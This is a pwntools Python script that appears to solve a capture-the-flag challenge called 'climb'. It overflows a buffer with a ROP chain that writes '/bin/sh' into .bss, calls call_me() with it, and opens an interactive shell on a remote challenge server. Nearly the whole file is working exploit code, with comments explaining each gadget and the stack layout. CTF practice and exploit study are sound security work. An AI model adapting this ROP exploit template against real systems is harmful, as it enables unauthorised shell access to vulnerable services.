from pwn import *
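# pwntools exploit for the "climb" challenge: ROP chain that writes "/bin/sh"
# into .bss with a write gadget, then calls call_me() with rdi pointing at it.
context(arch='x86_64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']

# Target selection: exactly one of these should be True.
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False

local_bin = "./climb"
# Path of the binary on the SSH host (only used when REMOTESSH is True).
# The original referenced an undefined `remote_bin`, which raised NameError
# as soon as that branch was taken.
remote_bin = local_bin

# Gadgets and symbols are always resolved from the LOCAL copy of the binary,
# so ./climb must be byte-identical to what runs on the target: every offset
# below (and the hard-coded write gadget) is only valid for that exact build.
elf = ELF(local_bin)
rop = ROP(elf)

if LOCAL:
    p = process(local_bin)
elif REMOTETTCP:
    p = remote('cha.hackpack.club', 41702)
elif REMOTESSH:
    # Placeholder credentials -- fill in for a real SSH target and keep real
    # secrets out of this file (use an SSH key / agent or an env var).
    ssh_shell = ssh('user', 'server.ssh', password='password', port=22)
    p = ssh_shell.process(remote_bin)
else:
    # Without this the script fails later with a confusing NameError on `p`.
    raise SystemExit("set exactly one of LOCAL / REMOTETTCP / REMOTESSH to True")

if GDB and not REMOTETTCP and not REMOTESSH:
    # Only meaningful for a local process; p.pid does not exist for a remote().
    gdb.attach(p.pid, "continue")

POP_RAX = rop.find_gadget(['pop rax', 'ret'])[0]
POP_RDX = rop.find_gadget(['pop rdx', 'ret'])[0]
POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
call_me = elf.symbols['call_me']

# Hard-coded address of the write-what-where gadget. From the chain layout it
# is presumably `mov [rdx], rax ; ret` (or equivalent) -- confirm with
# ROPgadget/ropper against ./climb. A fixed address only works because the
# binary is non-PIE; it breaks silently on any other build.
WRITE_GADGET = 0x0040065d
# Scratch slot in .bss that will hold the "/bin/sh" string (writable, fixed
# address, not touched by the program between the write and the call).
BINSH_ADDR = elf.bss(100)
# Exactly one qword (8 bytes incl. NUL) so a single store writes the whole
# NUL-terminated string. Bytes literal so this works on both py2 and py3
# (the original used a str literal, which cannot be concatenated with the
# bytes p64() returns under Python 3).
BINSH = b'/bin/sh\x00'

# Stack layout after the overflow:
#   40 bytes padding up to the saved return address (offset taken from the
#   original; verify with cyclic_find() on a crash if the build changes),
#   pop rax <- "/bin/sh\0"
#   pop rdx <- BINSH_ADDR
#   WRITE_GADGET            ; [rdx] = rax
#   pop rdi <- BINSH_ADDR
#   call_me                 ; call_me("/bin/sh")
payload = cyclic(40)
payload += p64(POP_RAX) + BINSH
payload += p64(POP_RDX) + p64(BINSH_ADDR)
payload += p64(WRITE_GADGET)
payload += p64(POP_RDI) + p64(BINSH_ADDR)
payload += p64(call_me)

# rop-chain payload
p.sendlineafter(b"respond?", payload)
print(p.clean())
# The original sends the payload a second time -- presumably the program
# prompts again after the first response. Verify against the binary.
p.sendline(payload)
p.interactive()
exit()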